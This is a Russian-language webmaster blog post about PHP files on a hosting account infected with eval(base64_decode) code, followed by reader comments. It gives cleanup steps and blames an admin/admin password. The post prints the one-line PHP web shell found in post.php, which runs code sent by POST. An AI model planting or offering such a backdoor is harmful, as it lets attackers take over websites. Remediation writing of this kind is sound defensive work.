Фон сайта

+7 (343) 221-30-69

Ноября
20
2018

Вредоносный код eval (base64_decode("...")) в PHP-файлах

Рейтинг:   / 6
ПлохоОтлично 

В общем такое дело... Как-то раз заметили, что у нас на хостинге в некоторых PHP-файлах, с которыми велись работы, стала появляться такая вот гадость: 

eval(base64_decode("DQplcnJvcl9yZXBvc......"));

Долго не думая, провели поиск этого текста по всем PHP-файлам на хостинге. Результаты поиска повергли нас в ужас! Заражённых файлов оказалось более 80 тысяч!

Стали разбираться в чем же дело, и что это за пакость такая.

Решение проблемы оказалось довольно простым:

  1. Находим и удаляем файл post.php, либо любой другой содержащий строку:
    <?php eval(base64_decode($_POST["php"])); ?>
    
    обратите внимание на то, что данная строчка может быть записана и в нужных файлах, поэтому просто удалите её.
  2. Запускаем поиск и замену по всем файлам вредоностного кода.
  3. Делаем дамп базы данных и так же, как и во втором пункте, проверяем его на надоевший нам вредоностный код.
  4. Меняем пароли доступа к админкам сайтов, к FTP и SSH.

Причиной

всему стала банальная халатность, ну или забывчивость веб-мастеров. На одном из сайтов, расположенных на хостинге, пара логин-пароль к админке осталась admin-admin.

Именно в папке этого сайта нашёлся файл post.php

Добавить комментарий

   


Защитный код
Обновить

Комментарии   

 
Kumigy
0 #2 Kumigy 23.04.2013 12:40
Цитирую Эльдар:
как раз столкнулся с такой проблемой.
заразились все сайты.
удаление вредоносного кода с индекс.пхп приводит к выводу сайта из строя. антивирус нашел файл wso2.php

Вопрос:

2 пунтк не понял. меняем на что?


Можешь заражённый файлик прислать на почту ?

Во втором пункте говорится о том что тебе нужно найти строку и заменить её на пустоту :-)
Цитировать | Сообщить модератору
 
 
Эльдар
0 #1 Эльдар 22.04.2013 21:03
как раз столкнулся с такой проблемой.
заразились все сайты.
удаление вредоносного кода с индекс.пхп приводит к выводу сайта из строя. антивирус нашел файл wso2.php

Вопрос:

2 пунтк не понял. меняем на что?
Цитировать | Сообщить модератору
 

Копилка знаний


Сайтостроение